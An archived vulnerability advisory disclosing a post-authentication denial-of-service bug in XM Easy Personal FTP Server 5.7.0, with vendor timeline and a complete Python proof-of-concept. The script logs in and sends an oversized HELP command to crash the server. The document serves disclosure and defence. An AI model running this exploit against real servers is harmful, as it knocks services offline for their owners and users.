AOH :: HP Unsorted X :: BT-21086.HTM

XM Easy Personal FTP Server Multiple DoS vulnerabilities



XM Easy Personal FTP Server Multiple DoS vulnerabilities
XM Easy Personal FTP Server Multiple DoS vulnerabilities



XM Easy Personal FTP Server Multiple DoS vulnerabilities

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10 

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/ 

Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when a long list of arguments is sent to certain FTP commands post authentication.

Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a parameter to these commands, the FTP server cannot process it and it will crash. Note that this is a post authentication vulnerability, so user must be logged in to exploit the vulnerability. No registers are overwritten, hence remote code execution may not be possible.

Severity:
High

Solution:
No patches available from vendor
No workaround is available at this time

Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure

PoC: Python Exploit
-----------------------------------------------------
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]................ 
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
# A Denial of service vulnerability exists in XM
# Personal FTP Server that causes the application to
# crash when a long list of arguments is sent to
# certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............

import os
import sys
import time
from ftplib import FTP

def usage():
        print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]"
        print "[.........neeraj(.)thakar(at)gmail(.)com..............]\n"
        print "Usage: ./XMPersonal_FTPServer_DoSPoC.py   \n"
        print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n"

# The Main function starts here..
if __name__ == "__main__":
        ftpport = '21'

        # get the args..
        if len(sys.argv) < 3:
                usage()
                sys.exit(1)
        ftpserver = sys.argv[1]
        user = sys.argv[2]
        passwd = sys.argv[3]

        print "Connecting to "+ftpserver+" using "+user+"....",

        # Try opening a connection to the FTP server
        try:
                F = FTP(ftpserver)
                F.timeout = 3
                if F:
                        print 'Connected !'
        except:
                print "\nCould not connect to the Server :(\n"
                sys.exit(1)

        #Lets create the Buffer..
        crap = "A" * 5000

        # Creat'in da'bomb
        dabomb = 'HELP '+crap

        print "Press any key to login.."
        ch = sys.stdin.read(1)

        # Lets login
        try:
                F.login(user, passwd)
        except:
                print "Oops.. Looks like you forgot to create a login !!\n"
                F.quit()
                sys.exit(1)
        print "Target Locked, Press any key to fire..",
        ch = sys.stdin.read(1)

        print 'Sendin Da\'Bomb..'
        try:
                F.sendcmd(dabomb)
        except:
                print 'Target destroyed !! Mission successfull..!'

        print 'Returning to base..'
        F.close()
        sys.exit(0)
-----------------------------------------------------

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.